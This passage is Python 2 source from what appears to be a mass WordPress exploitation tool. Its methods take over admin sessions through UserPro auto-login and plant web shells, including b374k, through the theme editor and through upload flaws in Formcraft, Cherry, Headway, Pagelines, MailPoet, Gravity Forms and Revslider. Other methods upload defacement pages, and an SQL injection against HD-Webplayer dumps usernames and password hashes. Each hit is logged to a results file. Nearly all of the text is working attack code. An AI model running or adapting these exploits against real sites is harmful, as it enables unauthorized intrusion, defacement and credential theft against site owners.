1203. writer.write(site + '/wp-content/plugins/wp-mobile-detector/cache/pwn.gif' + '\n')
1204. else:
1205. self.Print_NotVuln('wp-mobile-detector', site)
1206. else:
1207. self.Print_NotVuln('wp-mobile-detector', site)
1208. except:
1209. self.Print_NotVuln('wp-mobile-detector', site)
1210.  
1211. def get_WpNoncE(self, source):
1212. try:
1213. find = re.findall('<input type="hidden" id="_wpnonce" name="_wpnonce" value="(.*?)"', source)
1214. path = find[0].strip()
1215. return path
1216. except:
1217. pass
1218.  
1219. def get_WpFlag(self, source):
1220. try:
1221. find = re.findall('<option value="(.*?)" selected="selected">', source)
1222. path = find[0].strip()
1223. return path
1224. except:
1225. pass
1226.  
1227. def UserProExploit(self, site):
1228. try:
1229. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
1230. 'Accept': '*/*'}
1231. exploit = '/?up_auto_log=true'
1232. sess = requests.session()
1233. admin_re_page = 'http://' + site + '/wp-admin/'
1234. sess.get('http://' + site + exploit, timeout=10, headers=headers)
1235. Check_login = sess.get(admin_re_page, timeout=10, headers=headers)
1236. if '<li id="wp-admin-bar-logout">' in Check_login.text:
1237. with open('result/AdminTakeover_results.txt', 'a') as writer:
1238. writer.write(site + exploit + '\n')
1239. ___Get_editor = admin_re_page + 'theme-editor.php?file=search.php#template'
1240. ___Get_edit = admin_re_page + 'theme-editor.php'
1241. Get_source = sess.get(___Get_editor, headers=headers, timeout=5)
1242. source = Get_source.text
1243. _Wp_FlaG = self.get_WpFlag(source)
1244. _Wp_NoncE = self.get_WpNoncE(source)
1245. __data = {'_wpnonce': _Wp_NoncE,
1246. '_wp_http_referer': '/wp-admin/theme-editor.php?file=search.php',
1247. 'newcontent': self.shell_code,
1248. 'action': 'update',
1249. 'file': 'search.php',
1250. 'theme': _Wp_FlaG,
1251. 'scrollto': '0',
1252. 'docs-list': '',
1253. 'submit': 'Update+File'}
1254. sess.post(___Get_edit, data=__data, headers=headers)
1255. shell_PaTh = 'http://' + site + "/wp-content/themes/" + _Wp_FlaG + "/search.php"
1256. Check_sHell = sess.get(shell_PaTh, headers=headers)
1257. if 'wordpress_project' in Check_sHell.text:
1258. __po = {'_upl': 'Upload'}
1259. fil = {'file': open('Access.php', 'rb')}
1260. requests.post(shell_PaTh, data=__po, files=fil)
1261. shell_PaTh_DoNe = 'http://' + site + "/wp-content/themes/" + _Wp_FlaG + '/Access.php'
1262. Got_Shell = requests.get(shell_PaTh_DoNe, timeout=5)
1263. if 'b374k' in Got_Shell.text:
1264. self.Print_vuln_Shell(site + "/wp-content/themes/" + _Wp_FlaG + "/Access.php")
1265. with open('result/Shell_results.txt', 'a') as writer:
1266. writer.write(site + "/wp-content/themes/" + _Wp_FlaG + "/Access.php" + '\n')
1267. else:
1268. self.Print_vuln_Shell(site + "/wp-content/themes/" + _Wp_FlaG + "/search.php")
1269. with open('result/Shell_results.txt', 'a') as writer:
1270. writer.write(site + "/wp-content/themes/" + _Wp_FlaG + "/search.php" + '\n')
1271. else:
1272. self.Print_NotVuln('UserPro', site)
1273. else:
1274. self.Print_NotVuln('UserPro', site)
1275. except:
1276. self.Print_NotVuln('UserPro', site)
1277.  
1278.  
1279. def formcraftExploit_Shell(self, site):
1280. try:
1281. ShellFile = {'files[]': open(self.pagelinesExploitShell, 'rb')}
1282. Exp = 'http://' + site + '/wp-content/plugins/formcraft/file-upload/server/content/upload.php'
1283. Check = requests.get(Exp, timeout=5)
1284. if '"failed"' in Check.text.encode('utf-8'):
1285. GoT = requests.post(Exp, files=ShellFile, timeout=5)
1286. if 'new_name' in GoT.text.encode('utf-8'):
1287. GetIndexName = re.findall('"new_name":"(.*)",', GoT.text.encode('utf-8'))
1288. IndexPath = site + '/wp-content/plugins/formcraft/file-upload/server/content/files/'\
1289. + GetIndexName[0].split('"')[0]
1290. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
1291. if CheckIndex.status_code == 200:
1292. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
1293. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
1294. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
1295. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
1296. with open('result/Shell_results.txt', 'a') as writer:
1297. writer.write(site + '/wp-content/vuln.php' + '\n')
1298. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
1299. self.Print_Vuln_index(site + '/vuln.htm')
1300. with open('result/Index_results.txt', 'a') as writer:
1301. writer.write(site + '/vuln.htm' + '\n')
1302. else:
1303. self.formcraftExploitIndeX(site)
1304. else:
1305. self.formcraftExploitIndeX(site)
1306. else:
1307. self.formcraftExploitIndeX(site)
1308. else:
1309. self.formcraftExploitIndeX(site)
1310. except:
1311. self.formcraftExploitIndeX(site)
1312.  
1313. def formcraftExploitIndeX(self, site):
1314. try:
1315. ShellFile = {'files[]': open(self.Jce_Deface_image, 'rb')}
1316. Exp = 'http://' + site + '/wp-content/plugins/formcraft/file-upload/server/content/upload.php'
1317. Check = requests.get(Exp, timeout=5)
1318. if '"failed"' in Check.text.encode('utf-8'):
1319. GoT = requests.post(Exp, files=ShellFile, timeout=5)
1320. if 'new_name' in GoT.text.encode('utf-8'):
1321. GetIndexName = re.findall('"new_name":"(.*)",', GoT.text.encode('utf-8'))
1322. IndexPath = site + '/wp-content/plugins/formcraft/file-upload/server/content/files/'\
1323. + GetIndexName[0].split('"')[0]
1324. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
1325. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
1326. self.Print_Vuln_index(IndexPath)
1327. with open('result/Index_results.txt', 'a') as writer:
1328. writer.write(IndexPath + '\n')
1329. else:
1330. self.Print_NotVuln('formcraft', site)
1331. else:
1332. self.Print_NotVuln('formcraft', site)
1333. else:
1334. self.Print_NotVuln('formcraft', site)
1335. except:
1336. self.Print_NotVuln('formcraft', site)
1337.  
1338.  
1339.  
1340. def cherry_plugin(self, site):
1341. try:
1342. ShellFile = {'file': (self.pagelinesExploitShell, open(self.pagelinesExploitShell, 'rb')
1343. , 'multipart/form-data')}
1344. Exp = 'http://' + site + '/wp-content/plugins/cherry-plugin/admin/import-export/upload.php'
1345. aa = requests.post(Exp, files=ShellFile, timeout=5)
1346. Shell = 'http://' + site + '/wp-content/plugins/cherry-plugin/admin/import-export/' \
1347. + self.pagelinesExploitShell.split('/')[1]
1348. GoT = requests.get(Shell, timeout=5)
1349. if GoT.status_code == 200:
1350. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
1351. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
1352. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
1353. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
1354. with open('result/Shell_results.txt', 'a') as writer:
1355. writer.write(site + '/wp-content/vuln.php' + '\n')
1356. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
1357. self.Print_Vuln_index(site + '/vuln.htm')
1358. with open('result/Index_results.txt', 'a') as writer:
1359. writer.write(site + '/vuln.htm' + '\n')
1360. else:
1361. self.Print_NotVuln('cherry plugin', site)
1362. else:
1363. self.Print_NotVuln('cherry plugin', site)
1364. except:
1365. self.Print_NotVuln('cherry plugin', site)
1366.  
1367. def addblockblocker(self, site):
1368. try:
1369. ShellFile = {'popimg': open(self.pagelinesExploitShell, 'rb')}
1370. Exp = 'http://' + site + '/wp-admin/admin-ajax.php?action=getcountryuser&cs=2'
1371. requests.post(Exp, files=ShellFile, timeout=5)
1372. CheckShell = 'http://' + site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/' \
1373. + self.pagelinesExploitShell.split('/')[1]
1374. GoT = requests.get(CheckShell, timeout=5)
1375. if GoT.status_code == 200:
1376. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
1377. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
1378. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
1379. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
1380. with open('result/Shell_results.txt', 'a') as writer:
1381. writer.write(site + '/wp-content/vuln.php' + '\n')
1382. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
1383. self.Print_Vuln_index(site + '/vuln.htm')
1384. with open('result/Index_results.txt', 'a') as writer:
1385. writer.write(site + '/vuln.htm' + '\n')
1386. else:
1387. self.Print_NotVuln('Adblock Blocker', site)
1388. else:
1389. self.Print_NotVuln('Adblock Blocker', site)
1390. except:
1391. self.Print_NotVuln('Adblock Blocker', site)
1392.  
1393. def HeadWayThemeExploit(self, site):
1394. try:
1395. CheckTheme = requests.get('http://' + site, timeout=5)
1396. if '/wp-content/themes/headway' in CheckTheme.text.encode('utf-8'):
1397. ThemePath = re.findall('/wp-content/themes/(.*)/style.css', CheckTheme.text.encode('utf-8'))
1398. ShellFile = {'Filedata': open(self.pagelinesExploitShell, 'rb')}
1399. useragent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
1400.  
1401. url = "http://" + site + "/wp-content/themes/" + ThemePath[0] +\
1402. "/library/visual-editor/lib/upload-header.php"
1403. Check = requests.get(url, timeout=5)
1404. if Check.status_code == 200:
1405. GoT = requests.post(url, files=ShellFile, headers=useragent)
1406. if GoT.status_code == 200:
1407. Shell_URL = 'http://' + site + '/wp-content/uploads/headway/header-uploads/' +\
1408. self.pagelinesExploitShell.split('/')[1]
1409. requests.get(Shell_URL, timeout=5)
1410. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
1411. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
1412. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
1413. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
1414. with open('result/Shell_results.txt', 'a') as writer:
1415. writer.write(site + '/wp-content/vuln.php' + '\n')
1416. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
1417. self.Print_Vuln_index(site + '/vuln.htm')
1418. with open('result/Index_results.txt', 'a') as writer:
1419. writer.write(site + '/vuln.htm' + '\n')
1420. else:
1421. self.Print_NotVuln('Headway Theme', site)
1422. else:
1423. self.Print_NotVuln('Headway Theme', site)
1424. else:
1425. self.Print_NotVuln('Headway Theme', site)
1426. else:
1427. self.Print_NotVuln('Headway Theme', site)
1428. except:
1429. self.Print_NotVuln('Headway Theme', site)
1430.  
1431.  
1432. def pagelinesExploit(self, site):
1433. try:
1434. FileShell = {'file': open(self.pagelinesExploitShell, 'rb')}
1435. PostData = {'settings_upload': "settings", 'page': "pagelines"}
1436. Useragent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
1437. url = "http://" + site + "/wp-admin/admin-post.php"
1438. GoT = requests.post(url, files=FileShell, data=PostData, headers=Useragent, timeout=5)
1439. if GoT.status_code == 200:
1440. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
1441. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
1442. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
1443. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
1444. with open('result/Shell_results.txt', 'a') as writer:
1445. writer.write(site + '/wp-content/vuln.php' + '\n')
1446. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
1447. self.Print_Vuln_index(site + '/vuln.htm')
1448. with open('result/Index_results.txt', 'a') as writer:
1449. writer.write(site + '/vuln.htm' + '\n')
1450. else:
1451. self.Print_NotVuln('Pagelines', site)
1452. else:
1453. self.Print_NotVuln('Pagelines', site)
1454. except:
1455. self.Print_NotVuln('Pagelines', site)
1456.  
1457.  
1458. def wysijaExploit(self, site):
1459. try:
1460. FileShell = {'my-theme': open(self.MailPoetZipShell, 'rb')}
1461. PostData = {'action': "themeupload", 'submitter': "Upload", 'overwriteexistingtheme': "on",
1462. 'page': 'GZNeFLoZAb'}
1463. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
1464. url = "http://" + site + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
1465. GoT = requests.post(url, files=FileShell, data=PostData, headers=UserAgent, timeout=10)
1466. if 'page=wysija_campaigns&amp;action=themes&amp;reload=1' in GoT.text.encode('utf-8'):
1467. sh = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/vuln.php'
1468. index = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/pwn.gif'
1469. CheckShell = requests.get(sh, timeout=5)
1470. CheckIndex = requests.get(index, timeout=5)
1471. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
1472. self.Print_vuln_Shell(site + '/wp-content/uploads/wysija/themes/rock/vuln.php')
1473. with open('result/Shell_results.txt', 'a') as writer:
1474. writer.write(site + '/wp-content/uploads/wysija/themes/rock/vuln.php' + '\n')
1475. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
1476. self.Print_Vuln_index(site + '/wp-content/uploads/wysija/themes/rock/pwn.gif')
1477. with open('result/Index_results.txt', 'a') as writer:
1478. writer.write(site + '/wp-content/uploads/wysija/themes/rock/pwn.gif' + '\n')
1479. else:
1480. self.Print_NotVuln('wysija', site)
1481. else:
1482. self.Print_NotVuln('wysija', site)
1483. except:
1484. self.Print_NotVuln('wysija', site)
1485.  
1486.  
1487.  
1488. def HD_WebPlayerSqli(self, site):
1489. try:
1490. check = requests.get('http://' + site + '/wp-content/plugins/hd-webplayer/playlist.php', timeout=5)
1491. if '<?xml version="' in check.text.encode('utf-8'):
1492. Exploit = '/wp-content/plugins/hd-webplayer/playlist.php' \
1493. '?videoid=1+union+select+1,2,concat(user_login,0x3a,user_pass)' \
1494. ',4,5,6,7,8,9,10,11+from+wp_users--'
1495. GoT = requests.get('http://' + site + Exploit, timeout=5)
1496. User_Pass = re.findall('<title>(.*)</title>', GoT.text.encode('utf-8'))
1497. username = User_Pass[1].split(':')[0]
1498. password = User_Pass[1].split(':')[1]
1499. self.Print_Vuln('HD-Webplayer', site)
1500. self.Print_Username_Password(username, password)
1501. with open('result/Sqli_result.txt', 'a') as writer:
1502. writer.write('------------------------------' + '\n' + 'Domain: ' + site + '\n' +
1503. 'Username : ' + username + '\n' + 'Password : ' + password + '\n')
1504. else:
1505. self.Print_NotVuln('HD-Webplayer', site)
1506. except:
1507. self.Print_NotVuln('HD-Webplayer', site)
1508.  
1509.  
1510. def Gravity_Forms_Shell(self, site):
1511. try:
1512. Grav_checker = requests.get('http://' + site + '/?gf_page=upload', timeout=5)
1513. if '"status" : "error"' in Grav_checker.text.encode('utf-8'):
1514. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
1515. fileDeface = {'file': open(self.gravShell, 'rb')}
1516. post_data = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../', 'name': 'css.php5'}
1517. try:
1518. url = "http://" + site + '/?gf_page=upload'
1519. GoT = requests.post(url, files=fileDeface, data=post_data, headers=UserAgent, timeout=5)
1520. if '.php5' in GoT.text.encode('utf-8'):
1521. CheckShell = requests.get('http://' + site + '/wp-content/_input_3_css.php5', timeout=5)
1522. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
1523. Checkshell2 = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
1524. if 'Vuln!!' in Checkshell2.text.encode('utf-8'):
1525. Checkshell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
1526. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
1527. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
1528. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
1529. with open('result/Shell_results.txt', 'a') as writer:
1530. writer.write(site + '/wp-content/vuln.php' + '\n')
1531. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
1532. self.Print_Vuln_index(site + '/vuln.htm')
1533. with open('result/Index_results.txt', 'a') as writer:
1534. writer.write(site + '/vuln.htm' + '\n')
1535. else:
1536. self.Gravity_forms_Index(site)
1537. else:
1538. self.Gravity_forms_Index(site)
1539. else:
1540. self.Gravity_forms_Index(site)
1541. else:
1542. self.Gravity_forms_Index(site)
1543. except Exception, e:
1544. self.Print_NotVuln('Gravity-Forms', site)
1545. else:
1546. self.Print_NotVuln('Gravity Forms', site)
1547. except:
1548. self.Timeout(site)
1549.  
1550.  
1551. def Gravity_forms_Index(self, site):
1552. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
1553. fileDeface = {'file': open(self.Jce_Deface_image, 'rb')}
1554. post_data = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../', 'name': 'pwn.gif'}
1555. post_data2 = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../../', 'name': 'pwn.gif'}
1556. try:
1557. url = "http://" + site + '/?gf_page=upload'
1558. requests.post(url, files=fileDeface, data=post_data, headers=UserAgent, timeout=5)
1559. requests.post(url, files=fileDeface, data=post_data2, headers=UserAgent, timeout=5)
1560. CheckIndex = requests.get('http://' + site + '/_input_3_pwn.gif', timeout=5)
1561. CheckIndex2 = requests.get('http://' + site + '/wp-content/_input_3_pwn.gif', timeout=5)
1562. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
1563. self.Print_Vuln_index(site + '/_input_3_pwn.gif')
1564. with open('result/Index_results.txt', 'a') as writer:
1565. writer.write(site + '/_input_3_pwn.gif' + '\n')
1566. elif 'GIF89a' in CheckIndex2.text.encode('utf-8'):
1567. self.Print_Vuln_index(site + '/wp-content/_input_3_pwn.gif')
1568. with open('result/Index_results.txt', 'a') as writer:
1569. writer.write(site + '/wp-content/_input_3_pwn.gif' + '\n')
1570. else:
1571. self.Print_NotVuln('Gravity-Forms', site)
1572. except Exception, e:
1573. self.Print_NotVuln('Gravity-Forms', site)
1574.  
1575. def WP_User_Frontend(self, site):
1576. try:
1577. CheckVuln = requests.get('http://' + site + '/wp-admin/admin-ajax.php?action=wpuf_file_upload', timeout=5)
1578. if 'error' in CheckVuln.text or CheckVuln.status_code == 200:
1579. post = {}
1580. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
1581. post['action'] = 'wpuf_file_upload'
1582. files = {'wpuf_file': open(self.Jce_Deface_image, 'rb')}
1583. try:
1584. _url = 'http://' + site + "/wp-admin/admin-ajax.php"
1585. _open = requests.post(_url, files=files, data=post, headers=UserAgent, timeout=10)
1586. if 'image][]' in _open.text.encode('utf-8'):
1587. _Def = site + "/wp-content/uploads/20" + self.year + "/" + self.month + "/" + self.Jce_Deface_image.split('/')[1]
1588. Check_Deface = requests.get('http://' + _Def, timeout=5)
1589. if 'GIF89a' in Check_Deface.text.encode('utf-8'):
1590. self.Print_Vuln_index(_Def)
1591. with open('result/Index_results.txt', 'a') as writer:
1592. writer.write(_Def + '\n')
1593. else:
1594. self.Print_NotVuln('WP-User-Frontend', site)
1595. else:
1596. self.Print_NotVuln('WP-User-Frontend', site)
1597. except:
1598. self.Print_NotVuln('WP-User-Frontend', site)
1599. else:
1600. self.Print_NotVuln('WP-User-Frontend', site)
1601. except:
1602. self.Print_NotVuln('WP-User-Frontend', site)
1603.  
1604.  
1605. def Revslider_css(self, site):
1606. IndeXText = 'Vuln!! Patch it Now!'
1607. ency = {'action': "revslider_ajax_action",
1608. 'client_action': "update_captions_css",
1609. 'data': "<body style='color: transparent;background-color: black'><center><h1>"
1610. "<b style='color: white'>" + IndeXText + "<p style='color: transparent'>",
1611.  
1612. }
1613. try:
1614. url = "http://" + site + "/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css"
1615. aa = requests.post(url, data=ency, timeout=5)
1616. if 'succesfully' in aa.text.encode('utf-8'):
1617. deface = site + '/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css'
1618. self.Print_Vuln_index(deface)
1619. with open('result/Index_results.txt', 'a') as writer:
1620. writer.write(deface + '\n')
1621. else:
1622. self.Print_NotVuln('Revslider', site)
1623. except:
1624. self.Print_NotVuln('Revslider', site)
1625.  
1626. def Revslider_SHELL(self, site):
1627. try:
1628. UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
1629. Exploit = 'http://' + site + '/wp-admin/admin-ajax.php'
1630. data = {'action': "revslider_ajax_action", 'client_action': "update_plugin"}
1631. FileShell = {'update_file': open(self.MailPoetZipShell, 'rb')}
1632. CheckRevslider = requests.get('http://' + site, timeout=5)
1633. if '/wp-content/plugins/revslider/' in CheckRevslider.text.encode('utf-8'):
1634. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1635. CheckRev = requests.get('http://' + site +
1636. '/wp-content/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1637. if 'GIF89a' in CheckRev.text.encode('utf-8'):
1638. ShellCheck = requests.get('http://' + site +
1639. '/wp-content/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1640. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1641. self.Print_vuln_Shell(site + '/wp-content/plugins/revslider/temp/update_extract/vuln.php')
1642. with open('result/Shell_results.txt', 'a') as writer:
1643. writer.write(site + '/wp-content/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1644. self.Print_Vuln_index(site + '/wp-content/plugins/revslider/temp/update_extract/pwn.gif')
1645. with open('result/Index_results.txt', 'a') as writer:
1646. writer.write(site + '/wp-content/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1647. self.Revslider_Config(site)
1648. else:
1649. self.Revslider_Config(site)
1650. elif '/wp-content/themes/Avada/' in CheckRevslider.text.encode('utf-8'):
1651. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1652. CheckRev1 = requests.get('http://' + site +
1653. '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1654. if 'GIF89a' in CheckRev1.text.encode('utf-8'):
1655. ShellCheck = requests.get('http://' + site +
1656. '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1657. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1658. self.Print_vuln_Shell(
1659. site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/vuln.php')
1660. with open('result/Shell_results.txt', 'a') as writer:
1661. writer.write(
1662. site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1663. self.Print_Vuln_index(
1664. site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/pwn.gif')
1665. with open('result/Index_results.txt', 'a') as writer:
1666. writer.write(
1667. site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1668. self.Revslider_Config(site)
1669. else:
1670. self.Revslider_Config(site)
1671. elif '/wp-content/themes/striking_r/' in CheckRevslider.text.encode('utf-8'):
1672. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1673. CheckRev2 = requests.get('http://' + site +
1674. '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1675. if 'GIF89a' in CheckRev2.text.encode('utf-8'):
1676. ShellCheck = requests.get('http://' + site +
1677. '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1678. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1679. self.Print_vuln_Shell(
1680. site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/vuln.php')
1681. with open('result/Shell_results.txt', 'a') as writer:
1682. writer.write(
1683. site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1684. self.Print_Vuln_index(
1685. site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/pwn.gif')
1686. with open('result/Index_results.txt', 'a') as writer:
1687. writer.write(
1688. site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1689. self.Revslider_Config(site)
1690. else:
1691. self.Revslider_Config(site)
1692. elif '/wp-content/themes/IncredibleWP/' in CheckRevslider.text.encode('utf-8'):
1693. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1694. CheckRev3 = requests.get('http://' + site +
1695. '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1696. if 'GIF89a' in CheckRev3.text.encode('utf-8'):
1697. ShellCheck = requests.get('http://' + site +
1698. '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1699. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1700. self.Print_vuln_Shell(
1701. site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/vuln.php')
1702. with open('result/Shell_results.txt', 'a') as writer:
1703. writer.write(
1704. site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1705. self.Print_Vuln_index(
1706. site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/pwn.gif')
1707. with open('result/Index_results.txt', 'a') as writer:
1708. writer.write(
1709. site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1710. self.Revslider_Config(site)
1711. else:
1712. self.Revslider_Config(site)
1713. elif '/wp-content/themes/ultimatum/' in CheckRevslider.text.encode('utf-8'):
1714. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1715. CheckRev4 = requests.get('http://' + site +
1716. '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1717. if 'GIF89a' in CheckRev4.text.encode('utf-8'):
1718. ShellCheck = requests.get('http://' + site +
1719. '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1720. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1721. self.Print_vuln_Shell(
1722. site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/vuln.php')
1723. with open('result/Shell_results.txt', 'a') as writer:
1724. writer.write(
1725. site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1726. self.Print_Vuln_index(
1727. site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/pwn.gif')
1728. with open('result/Index_results.txt', 'a') as writer:
1729. writer.write(
1730. site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1731. self.Revslider_Config(site)
1732. else:
1733. self.Revslider_Config(site)
1734. elif '/wp-content/themes/medicate/' in CheckRevslider.text.encode('utf-8'):
1735. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1736. CheckRev5 = requests.get('http://' + site +
1737. '/wp-content/themes/medicate/script/revslider/temp/update_extract/pwn.gif', timeout=5)
1738. if 'GIF89a' in CheckRev5.text.encode('utf-8'):
1739. ShellCheck = requests.get('http://' + site +
1740. '/wp-content/themes/medicate/script/revslider/temp/update_extract/vuln.php', timeout=5)
1741. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1742. self.Print_vuln_Shell(
1743. site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/vuln.php')
1744. with open('result/Shell_results.txt', 'a') as writer:
1745. writer.write(
1746. site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/vuln.php' + '\n')
1747. self.Print_Vuln_index(
1748. site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/pwn.gif')
1749. with open('result/Index_results.txt', 'a') as writer:
1750. writer.write(
1751. site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/pwn.gif' + '\n')
1752. self.Revslider_Config(site)
1753. else:
1754. self.Revslider_Config(site)
1755. elif '/wp-content/themes/centum/' in CheckRevslider.text.encode('utf-8'):
1756. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1757. CheckRev6 = requests.get('http://' + site +
1758. '/wp-content/themes/centum/revslider/temp/update_extract/pwn.gif', timeout=5)
1759. if 'GIF89a' in CheckRev6.text.encode('utf-8'):
1760. ShellCheck = requests.get('http://' + site +
1761. '/wp-content/themes/centum/revslider/temp/update_extract/vuln.php', timeout=5)
1762. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1763. self.Print_vuln_Shell(
1764. site + '/wp-content/themes/centum/revslider/temp/update_extract/vuln.php')
1765. with open('result/Shell_results.txt', 'a') as writer:
1766. writer.write(
1767. site + '/wp-content/themes/centum/revslider/temp/update_extract/vuln.php' + '\n')
1768. self.Print_Vuln_index(site + '/wp-content/themes/centum/revslider/temp/update_extract/pwn.gif')
1769. with open('result/Index_results.txt', 'a') as writer:
1770. writer.write(
1771. site + '/wp-content/themes/centum/revslider/temp/update_extract/pwn.gif' + '\n')
1772. self.Revslider_Config(site)
1773. else:
1774. self.Revslider_Config(site)
1775. elif '/wp-content/themes/beach_apollo/' in CheckRevslider.text.encode('utf-8'):
1776. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1777. CheckRev7 = requests.get('http://' + site +
1778. '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1779. if 'GIF89a' in CheckRev7.text.encode('utf-8'):
